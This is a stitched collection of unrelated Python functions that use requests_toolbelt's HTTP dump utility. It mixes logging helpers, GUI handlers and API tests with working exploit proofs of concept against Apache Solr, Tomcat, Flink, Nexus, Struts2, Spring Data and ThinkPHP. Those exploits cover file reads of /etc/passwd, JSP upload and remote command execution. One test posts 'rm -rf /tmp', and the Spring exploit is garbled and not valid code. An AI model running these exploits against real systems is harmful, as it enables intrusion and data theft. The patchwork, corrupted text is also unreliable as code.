def _log_response(self, response, message):
    """Log an HTTP response at a level chosen from its status code.

    200-OK and server-error (>= 500) responses are logged at INFO; every
    other non-OK status is logged at ERROR together with the "errors"
    field of the JSON body. A full wire dump is always logged at DEBUG.

    NOTE(review): logging >= 500 at INFO rather than ERROR is unusual --
    confirm this is intentional.
    """
    try:
        if response.status_code == requests.codes.ok or response.status_code >= requests.codes.server_error:
            self._logger.info("[{}] {} | {} {}".format(response.request.method, message, response.status_code, response.reason))
        else:
            # Non-OK client-side errors: surface the API's "errors" payload.
            self._logger.error("[{}] {} | {} {} ({})".format(response.request.method, message, response.status_code, response.reason, response.json()["errors"]))
        self._logger.debug("DUMP:\n{}".format(dump.dump_all(response).decode("utf-8")))
    except (UnicodeDecodeError, JSONDecodeError) as e:
        # Body was not valid UTF-8 / JSON; skip the dump rather than crash.
        self._logger.debug("DUMP:\nImpossible to decode.")
def send(*args, **kw):
    """Wrapper around ``real_send`` that prints a full dump of the exchange.

    Delegates to ``real_send`` (captured from the enclosing scope), prints
    the request/response dump line by line -- decoded as UTF-8 where
    possible, as raw bytes otherwise -- and returns the response unchanged.

    Fix: the original except branch re-assigned ``line = bytes(line)``,
    which is a no-op since ``splitlines()`` on bytes already yields bytes.
    """
    response = real_send(*args, **kw)
    from requests_toolbelt.utils import dump
    data = dump.dump_all(response)
    for line in data.splitlines():
        try:
            line = line.decode('utf-8')
        except UnicodeDecodeError:
            # Not valid UTF-8: print the raw bytes repr as before.
            pass
        print(line)
    return response
def cve_20210408_filereading(self):
    """Apache Solr arbitrary-file-read PoC (tagged CVE_20210408 here).

    Hits /solr/<core>/debug/dump with stream.url=file://<path>. Success is
    signalled by "root" (Linux /etc/passwd) or a Chinese Windows
    "file not found" message in the body. When self.VULN is not the string
    'False', self.CMD is used as the file path instead of /etc/passwd.
    All outcomes are reported through the project-level ``verify`` helpers.
    """
    self.pocname = 'Apachesolr:CVE_20210408'
    self.method = 'get'
    self.rawdata = 'null'
    self.info = '[file readind]'
    self.r = "PoCWating"
    self.path = '/solr/{}/debug/dump?param=ContentStreams&stream.url=file://{}'
    self.data = r''
    self.headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
        'Connection': 'close',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*'
    }
    try:
        if self.VULN == 'False':
            # Detection mode: try to read /etc/passwd from the target core.
            self.request = requests.get(
                self.url + self.path.format(self.corename, '/etc/passwd'),
                data=self.data,
                headers=self.headers,
                timeout=self.TIMEOUT,
                verify=False)
            self.rawdata = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            if r"root" in self.request.text or r"系统找不到" in self.request.text:
                self.r = 'PoCSuCCeSS'
                verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info, self.env)
            else:
                verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
        else:
            # Exploit mode: read the user-supplied path (self.CMD).
            self.request = requests.get(
                self.url + self.path.format(self.corename, self.CMD),
                data=self.data,
                headers=self.headers,
                timeout=self.TIMEOUT,
                verify=False)
            verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
    except requests.exceptions.Timeout as error:
        verify.timeout_output(self.pocname)
    except requests.exceptions.ConnectionError as error:
        verify.connection_output(self.pocname)
    except Exception as error:
        verify.error_output(str(error), self.pocname)
def on_click(self):
    """On click: run the request, show the raw dump, and update the status.

    Displays the full wire dump in the raw text view; on HTTP 200 the dump
    is saved to history and the X-Vcc-Api-Queue-Status response header is
    shown. NOTE(review): raises KeyError if that header is absent --
    confirm the API always sends it.
    """
    r = self.communicate()
    rawstr = dump.dump_all(r)
    self.inside('raw_TextView.raw').setPlainText(rawstr.decode('utf-8'))
    self.inside('response_HeadView.status').clear()
    if r.status_code == 200:
        path = save_history(rawstr, r)
        self.inside('response_HeadView.status').setText(r.headers['X-Vcc-Api-Queue-Status'])
def swift_head(host='127.0.0.1', port='7480', cmd='/', subuser='', secret_key='', show_dump=False):
    """Issue a Swift HEAD request against a radosgw endpoint.

    Authenticates via swift_auth() to obtain an X-Auth-Token, sends the
    HEAD request, then either prints a full wire dump (show_dump=True) or
    the response body.

    Fix: the final output used a Python 2-only ``print`` statement,
    inconsistent with the ``print(...)`` call in the other branch; it is
    now parenthesized and works on both Python 2 and 3.
    """
    url = 'http://%s:%s%s' % (host, port, cmd)
    serverurl = '%s:%s' % (host, port)
    X_Auth_Token = swift_auth(serverurl, subuser=subuser, secret_key=secret_key)
    headers = {'x-auth-token': X_Auth_Token}
    response = requests.head(url, headers=headers)
    if show_dump:
        data = dump.dump_all(response)
        print(data.decode('utf-8'))
    else:
        print(response.content)
def post_allocations(allocations, algorithm_id=6):
    """POST the given allocations to the service's post_allocations endpoint.

    The request body merges the module-level ``auth_args`` with the
    allocations payload and the algorithm id.

    Returns "success" on HTTP 200, otherwise a human-readable error string
    containing the status code.

    Fix: removed the dead ``data = dump.dump_all(r)`` assignment -- the
    dump was never used and silently shadowed the request payload.
    """
    url = _baseurl + 'post_allocations'
    data = {**auth_args, **{
        'allocations': allocations,
        'algorithm_id': algorithm_id
    }}
    r = requests.post(url, json=data)
    if r.status_code == 200:
        return "success"
    return "There was a problem: " + str(r.status_code)
def saveRequest(req):
    """Persist a gzip-compressed raw HTTP dump of *req* for debugging.

    Dumps are grouped in a per-day directory under debug_data/; the file
    name is derived from the request URL via Encode(). Always returns True.
    """
    target_dir = 'debug_data/{}/'.format(datetime.now().strftime('%d-%m-%Y'))
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    dump_text = dump.dump_all(req).decode('UTF-8')
    gz_name = '{}.gz'.format(Encode(req.url))
    with gzip.open(target_dir + gz_name, 'wb') as gz_file:
        gz_file.write(dump_text.encode('UTF-8'))
    Log('GZip request saved as "%s"' % gz_name)
    return True
def test_create_user_with_incorrect_data(key, value, error, param_json, url):
    """Negative test: creating a user with one corrupted field returns 400
    and the expected error message; the raw exchange is attached to allure.

    Fixes: the allure.attach() call referenced the undefined name
    ``response`` (the response variable is ``r``), and the local ``json``
    shadowed the json module -- renamed to ``body``.
    """
    with allure.step('копируем данные в json'):
        data = deepcopy(param_json)
        data[key] = value
    with allure.step(
        'отправляем рост запрос на создание пользователя с некорректными данными'
    ):
        r = requests.post(url, json=data)
        body = r.json()
    with allure.step('ассертим результат'):
        assert r.status_code == 400
        assert error in body['error']
        data = dump.dump_all(r)
        allure.attach(data.decode('utf-8'), r.text, type='html')
def proxy_post(request):
    """
    To act as a proxy for POST requests from Phenotips
    note: exempting csrf here since phenotips doesn't have this support

    Forwards the Django POST to the PhenoTips URL rebuilt by
    __aggregate_url_parameters(), reusing the requests.Session pickled in
    the Django session. Hop-by-hop headers are stripped before the reply
    is re-wrapped in an HttpResponse. Non-empty POSTs are also mirrored to
    the local store via __process_sync_request_helper(). Raises Http404 on
    any failure. (Python 2 code: print statements, pickled session.)
    """
    try:
        # print type(pickle.loads(request.session['current_phenotips_session']))
        # re-construct proxy-ed URL again
        url, parameters = __aggregate_url_parameters(request)
        project_name = request.session['current_project_id']
        uname, pwd = get_uname_pwd_for_project(project_name)
        # SECURITY NOTE(review): pickle.loads on session data -- safe only
        # if the session store is fully trusted.
        curr_session = pickle.loads(request.session['current_phenotips_session'])
        logger.info("===> POSTING to url: " + url)
        logger.info("===> DATA: " + str(dict(request.POST)))
        logger.info("===> SESSION - headers: " + str(curr_session.headers))
        logger.info("===> SESSION - cookies: " + str(curr_session.cookies))
        logger.info("===> SESSION - auth: " + str(curr_session.auth))
        import requests
        #response = requests.post(url, headers=curr_session.headers, cookies=curr_session.cookies, auth=curr_session.auth)
        response = curr_session.post(url, data=dict(request.POST))
        from requests_toolbelt.utils import dump
        data = dump.dump_all(response)
        logger.info("===> dump - original:\n" + data.decode('utf-8'))
        http_response = HttpResponse(response.content)
        for header in response.headers.keys():
            if header != 'connection' and header != 'Transfer-Encoding':
                # these hop-by-hop headers are not allowed by Django
                http_response[header] = response.headers[header]
        # persist outside of PhenoTips db as well
        if len(request.POST) != 0:
            patient_id = request.session['current_patient_id']
            __process_sync_request_helper(patient_id,
                                          request.user,
                                          project_name,
                                          parameters,
                                          pickle.loads(request.session['current_phenotips_session'])
                                          )
        logger.info("===> original api - HTTP RESPONSE DICT: ")
        for k,v in http_response.__dict__.items():
            logger.info("===> %s: %s" % (k,v))
        return http_response
    except Exception as e:
        print 'proxy post error:', e
        logger.error('phenotips.views:' + str(e))
        raise Http404
def cve_2019_17558_exp(self, cmd):
    """Exploit Apache Solr CVE-2019-17558 (VelocityResponseWriter RCE).

    Steps: enumerate the first core from the admin cores API, enable the
    Velocity response writer with params.resource.loader.enabled=true via
    the core /config API, then fire the prepared Velocity payload with
    RECOMMAND replaced by *cmd* and print the dumped exchange.
    """
    vul_name = "Apache Solr: CVE-2019-17558"
    core_name = None
    payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
    url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
        try:
            # First core name from the JSON "status" map; stays None if
            # the response is not the expected shape.
            core_name = list(json.loads(request.text)["status"])[0]
        except AttributeError:
            pass
        url_api = self.url + "/solr/" + str(core_name) + "/config"
        headers_json = {
            'Content-Type': 'application/json',
            'User-Agent': self.ua
        }
        # Config-API body that (re)registers the Velocity writer with
        # resource loading enabled -- the precondition for the RCE.
        set_api_data = """
        {
          "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
          }
        }
        """
        request = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False)
        request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False)
        raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
        verify.exploit_print(request.text, raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
def cve_2017_12615_poc(self):
    """PoC for Apache Tomcat CVE-2017-12615 (PUT arbitrary JSP upload).

    PUTs a random-named JSP containing a random marker via the trailing
    slash trick ("/x.jsp/"), then GETs "/x.jsp" and declares success when
    the marker is echoed back. Results are accumulated in self.vul_info
    and reported through verify.scan_print(); a thread lock guards the
    shared state.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Tomcat: CVE-2017-12615"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache Tomcat PUT 方法任意文件上传"
    self.vul_info["vul_numb"] = "CVE-2017-12615"
    self.vul_info["vul_apps"] = "Tomcat"
    self.vul_info["vul_date"] = "2017-09-20"
    self.vul_info["vul_vers"] = "7.0.0 - 7.0.81"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "任意文件上传"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Apache Tomcat如果开启PUT方法支持则可能存在远程代码执行漏洞,漏洞编号为CVE-2017-12615。" \
                                "攻击者可以在使用该漏洞上传JSP文件,从而导致远程代码执行。"
    self.vul_info["cre_date"] = "2021-01-21"
    self.vul_info["cre_auth"] = "zhzyker"
    self.name = random_md5()
    key = random_md5()
    # Trailing slash bypasses Tomcat's JSP-servlet mapping so the PUT
    # is handled by the default servlet.
    self.webshell = "/" + self.name + ".jsp/"
    self.payload1 = key
    self.payload2 = self.payload_cve_2017_12615
    try:
        self.request = requests.put(self.url + self.webshell,
                                    data=self.payload1,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
        # Fetch without the trailing slash to read the uploaded file back.
        self.request = requests.get(self.url + self.webshell[:-1],
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
        if key in self.request.text:
            self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = self.url + "/" + self.name + ".jsp"
            self.vul_info[
                "prt_info"] = "[url: " + self.url + "/" + self.name + ".jsp ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2020_17519_poc(self):
    """PoC for Apache Flink CVE-2020-17519 (REST API arbitrary file read).

    Requests /etc/passwd through the double-URL-encoded traversal in the
    JobManager logs endpoint and declares success when typical passwd
    content appears in the body. Results go through verify.scan_print();
    a thread lock guards the shared self.vul_info state.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Flink: CVE-2020-17519"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info[
        "vul_payd"] = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
    self.vul_info["vul_name"] = "Apache Flink 任意文件读取"
    self.vul_info["vul_numb"] = "CVE-2020-17519"
    self.vul_info["vul_apps"] = "Flink"
    self.vul_info["vul_date"] = "2021-01-05"
    self.vul_info["vul_vers"] = "1.5.1 - 1.11.2"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "任意文件读取"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Flink部分版本(1.11.0, 1.11.1, 1.11.2)中存在该漏洞,允许攻击者通过JobManager进程的REST " \
                                "API,读取JobManager本地文件系统上的任意文件。访问仅限于JobManager进程可访问的文件。"
    self.vul_info["cre_date"] = "2021-01-07"
    self.vul_info["cre_auth"] = "zhzyker"
    self.pocname = self.vul_info["prt_name"]
    self.rawdata = None
    self.info = "null"
    self.method = "get"
    self.r = "PoCWating"
    self.poc = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
    try:
        self.request = requests.get(self.url + self.poc,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
        # Both markers required to avoid false positives on error pages.
        if r"root:x:0:0:root:/root:/bin/bash" in self.request.text and r"daemon:" in self.request.text:
            self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info[
                "prt_info"] = "[url: " + self.url + self.poc + " ]"
            verify.scan_print(self.vul_info)
        else:
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        print(e)
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def on_click(self):
    """On click: send the request, display the raw wire dump, and refresh
    the status field.

    On HTTP 200 the dump is archived via save_history() and the
    X-Vcc-Api-Queue-Status response header is shown. NOTE(review):
    KeyError if the header is missing -- confirm the API guarantees it.
    """
    r = self.communicate()
    rawstr = dump.dump_all(r)
    self.inside('raw_TextView.raw').setPlainText(rawstr.decode('utf-8'))
    self.inside('response_HeadView.status').clear()
    if r.status_code == 200:
        path = save_history(rawstr, r)
        self.inside('response_HeadView.status').setText(
            r.headers['X-Vcc-Api-Queue-Status'])
def on_click(self):
    """On click: send the request, display the raw wire dump, and render
    the JSON body into the response tree view when the call succeeds
    (HTTP 200). The dump is also archived via save_history().
    """
    r = self.communicate()
    rawstr = dump.dump_all(r)
    self.inside('raw_TextView.raw').setPlainText(rawstr.decode('utf-8'))
    self.inside('response_TreeView.view').clear()
    if r.status_code == 200:
        path = save_history(rawstr, r)
        data = r.json()
        widget = self.inside('response_TreeView.view')
        # Recursively populate the tree starting from a synthetic "root".
        self.set_response_TreeView_columnset(widget, "root", data)
def execute_experiment(self, data, content_type='application/json'):
    """POST *data* (JSON-serialized) to the experiment endpoint.

    The execution token is appended to the authentication URL. Returns
    the decoded JSON response on HTTP 200; otherwise logs a full wire
    dump at ERROR and returns an empty dict.
    """
    endpoint = tacc_constants.EXPERIMENT_AUTHENTICATION_URL + self._execution_token
    response = requests.post(
        endpoint,
        headers={'Content-type': content_type},
        data=json.dumps(data),
    )
    if response.status_code == HTTPStatus.OK:
        return response.json()
    self.logger.error(dump.dump_all(response).decode('utf-8'))
    return {}
def saveRequest(url, req):
    """Write a gzip-compressed raw HTTP dump of *req*, prefixed with the
    target URL, into a per-day directory under debug_data/.

    The file name is a random uuid4 hex. Always returns True.
    """
    target_dir = 'debug_data/{}/'.format(datetime.now().strftime('%d-%m-%Y'))
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    body = '< Target URL: "%s"\r\n\r\n' % url
    body += dump.dump_all(req).decode('UTF-8')
    gz_name = '%s.gz' % uuid.uuid4().hex
    with gzip.open(target_dir + gz_name, 'wb') as gz_file:
        gz_file.write(body.encode('UTF-8'))
    Log('GZip request saved as "%s"' % gz_name)
    return True
def cve_2019_7238(self):
    """PoC for Nexus Repository Manager 3 CVE-2019-7238 (JEXL RCE).

    Detection mode (CodeTest.VULN is None): fingerprint the version from
    the Server header and flag 3.6.2 - 3.14.0 as vulnerable. Exploit mode:
    POST the prepared JEXL payload (RECOMMAND replaced by self.CMD) to
    /service/extdirect and report the dumped exchange.
    """
    self.pocname = "Nexus Repository Manager: CVE-2019-7238"
    self.payload = self.payload_cve_2019_7238.replace(
        "RECOMMAND", self.CMD)
    self.method = "post"
    self.rawdata = "null"
    self.info = CodeTest.Colored_.rce()
    self.headers = {
        'Accept': '*/*',
        'User-agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
        'Content-Type': 'application/json'
    }
    try:
        if CodeTest.VULN == None:
            self.request = requests.get(self.url, headers=self.headers, timeout=TIMEOUT, verify=False)
            # Version text between "/" and "-" of the Server header,
            # e.g. "Nexus/3.14.0-04" -> "3.14.0".
            self.nexus_ver = re.findall(r'/(.*)-', self.request.headers['Server'])[0]
            self.nexus_num = self.nexus_ver.replace(".", "")
            self.nexus_n = int(self.nexus_num)
            # NOTE(review): dot-stripped comparison (362 <= n <= 3140)
            # assumes the 3/4-digit encoding of "3.6.2".."3.14.0" --
            # fragile for other version shapes.
            if self.nexus_n >= 362 and self.nexus_n <= 3140:
                self.r = "PoCSuCCeSS"
                self.info += " [ver:" + self.nexus_ver + "]"
            CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info)
        else:
            self.request = requests.post(self.url + "/service/extdirect",
                                         data=self.payload,
                                         headers=self.headers,
                                         timeout=TIMEOUT,
                                         verify=False)
            self.rawdata = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info)
    except requests.exceptions.Timeout as error:
        CodeTest.verify.timeout_output(self.pocname)
    except requests.exceptions.ConnectionError as error:
        CodeTest.verify.connection_output(self.pocname)
    except Exception as error:
        CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
def send_token(verification_email, email_function):
    """Issue and email a fresh verification token.

    Marks all existing tokens for the address as expired, persists a new
    token, sends it with *email_function*, and stores a full dump of the
    email service's HTTP response on the token row for auditing.

    Returns the saved VerificationToken.
    """
    # Invalidate every previous token for this email in one UPDATE.
    VerificationToken.query.filter(
        VerificationToken.email_id == verification_email.id).update(
        {VerificationToken.expired: True})
    token = generate_token()
    verification_token = save_verification_token(verification_email.id, token)
    email_response = email_function(verification_email.email, token)
    # Keep the raw request/response exchange for later debugging.
    email_log = dump.dump_all(email_response).decode('utf-8')
    verification_token.email_log = email_log
    return save(verification_token)
def s2_032(self):
    """PoC for Apache Struts2 S2-032 (method: prefix OGNL injection).

    GETs the prepared S2-032 payload (RECOMMAND replaced by self.CMD)
    appended to the target URL and reports the dumped exchange through
    the project-level verify helpers.
    """
    self.pocname = "Apache Struts2: S2-032"
    self.payload = self.payload_s2_032.replace("RECOMMAND",self.CMD)
    self.method = "get"
    self.rawdata = "null"
    self.info = PocType_.rce()
    try:
        self.request = requests.get(self.url+self.payload, headers=headers, timeout=self.TIMEOUT, verify=False)
        self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
        verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
    except requests.exceptions.Timeout as error:
        verify.timeout_output(self.pocname)
    except requests.exceptions.ConnectionError as error:
        verify.connection_output(self.pocname)
    except Exception as error:
        verify.error_output(str(error), self.pocname)
def test_uploadfile_n(self, payload):
    """Negative test: POST /file without the mandatory File-Path header
    must return HTTP 500 with the HTTP_HEADER_NOT_PROVIDED error code,
    the expected version, and a timestamp.

    Fix: replaced the placeholder-less f-string f"/file" with a plain
    literal.
    """
    headers = {'Content-type': 'application/json'}
    mandatory_header_key = 'File-Path'
    response = requests.post(
        self.server + "/file", data=payload, headers=headers)
    body = response.json()
    print(dump.dump_all(response))
    self.assertEqual(response.status_code, 500)
    self.assertEqual(body.get('message'),
                     ErrorMessage.HTTP_CODE.get(ApiCode.HTTP_HEADER_NOT_PROVIDED.value) % mandatory_header_key)
    self.assertEqual(body.get('version'), self.expected_version)
    self.assertEqual(body.get('code'), ApiCode.HTTP_HEADER_NOT_PROVIDED.value)
    self.assertIsNotNone(body.get('timestamp'))
def Get(url):
    """GET *url* with the module-wide request settings.

    Optionally randomizes the User-Agent and prints a full wire dump when
    the module flags (random_Agents, Dump) are set.

    Returns the Response, or 0 on failure (callers test truthiness).

    Fix: the bare ``except:`` also swallowed KeyboardInterrupt and
    SystemExit; narrowed to ``except Exception`` while keeping the
    best-effort 0 return.
    """
    try:
        if random_Agents:
            headers['User-agent'] = ua.random
        r = get(url, allow_redirects=allow_redirects, cookies=cookies,
                headers=headers, timeout=Timeout, proxies=proxy, verify=False)
        if Dump:
            print(dump.dump_all(r).decode('utf-8'))
        return r
    except Exception:
        return 0
def gettosalfeld(url, withuser=True, debug=True):
    """GET *url* from the Salfeld portal API after logging in.

    Logs in with the module-level ``payload``, builds the session/pc-id
    auth headers, and requests either /api/<User>/<url> (withuser=True)
    or /api/<url>. When *debug* is set, prints a full wire dump.

    Returns the decoded JSON response.

    Fix: the local variable ``json`` shadowed the json module -- renamed
    to ``login_data``.
    """
    with requests.Session() as s:
        l = s.post('https://portal.salfeld.net/api/login/', json=payload)
        login_data = l.json()
        auth = {'X-sessionId': login_data['sessionID'], 'X-pcId': login_data['pcId']}
        if withuser:
            response = s.get('https://portal.salfeld.net/api/{}/{}'.format(
                User, url), headers=auth)
        else:
            response = s.get('https://portal.salfeld.net/api/{}'.format(url),
                             headers=auth)
        if debug:
            data = dump.dump_all(response)
            print(data.decode('utf-8'))
        return response.json()
def test_executecommand_rm_allowed_p(self):
    """Positive test: POST /command with "rm -rf /tmp" must succeed with
    HTTP 200, the SUCCESS code/message, a dict description, the expected
    version, and a timestamp.

    Fix: replaced the placeholder-less f-string f"/command" with a plain
    literal.
    """
    command = "rm -rf /tmp"
    response = requests.post(
        self.server + "/command", data=command)
    body = response.json()
    print(dump.dump_all(response))
    self.assertEqual(response.status_code, 200)
    self.assertEqual(body.get('message'),
                     ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
    self.assertIsInstance(body.get('description'), dict)
    self.assertEqual(body.get('version'), self.expected_version)
    self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
    self.assertIsNotNone(body.get('timestamp'))
def s2_devMode(self):
    """PoC for Apache Struts2 devMode OGNL injection.

    GETs the prepared devMode payload (RECOMMAND replaced by self.CMD)
    appended to the target URL -- redirects disabled so the raw response
    is inspected -- and reports the dumped exchange via the CodeTest
    verify helpers.
    """
    self.pocname = "Apache Struts2: S2-devMode"
    self.method = "get"
    self.rawdata = "null"
    self.info = CodeTest.Colored_.rce()
    self.payload = self.payload_s2_devMode.replace("RECOMMAND",self.CMD)
    try:
        self.request = requests.get(self.url+self.payload, headers=headers, timeout=TIMEOUT, verify=False, allow_redirects=False)
        self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
        CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info)
    except requests.exceptions.Timeout as error:
        CodeTest.verify.timeout_output(self.pocname)
    except requests.exceptions.ConnectionError as error:
        CodeTest.verify.connection_output(self.pocname)
    except Exception as error:
        CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
def cve_2018_1273_poc(self):
    """PoC for Spring Data Commons CVE-2018-1273 (SpEL injection RCE).

    Builds a username[...] SpEL payload that pings a unique subdomain of
    the configured ceye DNS-log domain; a DNS hit proves blind RCE.

    NOTE(review): the middle of this method is corrupted/redacted in the
    source ('******' replaces the HTTP request / dump code, and the
    matching ``try:`` was lost with it). The fragment is preserved
    verbatim below and is NOT valid Python as-is -- restore from the
    original project before use.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2018-1273"
    self.vul_info["vul_apps"] = "Spring"
    self.vul_info["vul_date"] = "2018-04-11"
    self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程命令执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \
                                "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。"
    self.vul_info["cre_date"] = "2021-01-26"
    self.vul_info["cre_auth"] = "zhzyker"
    md = random_md5()[:-20]
    cmd = "ping " + md + "." + self.ceye_domain
    # --- begin corrupted/redacted span (kept byte-for-byte) ---
    payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info["prt_info"] = "[ceye] [rce] [payload: " + payload + " ]" verify.scan_print(self.vul_info)
    # --- end corrupted/redacted span ---
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2019_9082_poc(self):
    """PoC for ThinkPHP CVE-2019-9082 (invokefunction remote code execution).

    Executes "echo <random md5>" through the call_user_func_array payload
    and declares success when the marker is echoed back -- excluding the
    URL-encoded false-positive form ("20" + marker, i.e. the payload
    itself reflected). Results go through verify.scan_print(); a thread
    lock guards the shared self.vul_info state.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "ThinkPHP: CVE-2019-9082"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = self.payload_cve_2019_9082.replace(
        "RECOMMAND", "whoami")
    self.vul_info["vul_name"] = "ThinkPHP5 5.0.23 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2019-9082"
    self.vul_info["vul_apps"] = "ThinkPHP"
    self.vul_info["vul_date"] = "2018-12-11"
    self.vul_info["vul_vers"] = "< 3.2.4"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "ThinkPHP prior to 3.2.4, as used in Open Source BMS v1.1.1 and other products, " \
                                "allows Remote Command Execution via public//?s=index/\think\app/invokefunction" \
                                "&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command."
    self.vul_info["cre_date"] = "2021-01-29"
    self.vul_info["cre_auth"] = "zhzyker"
    self.pocname = "ThinkPHP: "
    md = random_md5()
    cmd = "echo " + md
    self.payload = self.payload_cve_2019_9082.replace("RECOMMAND", cmd)
    self.method = "get"
    self.rawdata = "null"
    # "20" + marker appears when the payload is merely reflected
    # (URL-encoded space %20), not executed.
    bad = "20" + md
    try:
        self.request = requests.get(self.url + self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
        if md in self.request.text:
            if bad not in self.request.text:
                self.vul_info["vul_data"] = dump.dump_all(
                    self.request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def proxy_post(request):
    """
    To act as a proxy for POST requests from Phenotips
    note: exempting csrf here since phenotips doesn't have this support

    Forwards the Django POST to the PhenoTips URL rebuilt by
    __aggregate_url_parameters(), reusing the requests.Session pickled in
    the Django session. Hop-by-hop headers are stripped before the reply
    is re-wrapped in an HttpResponse. Non-empty POSTs are also mirrored
    locally via __process_sync_request_helper(). Raises Http404 on any
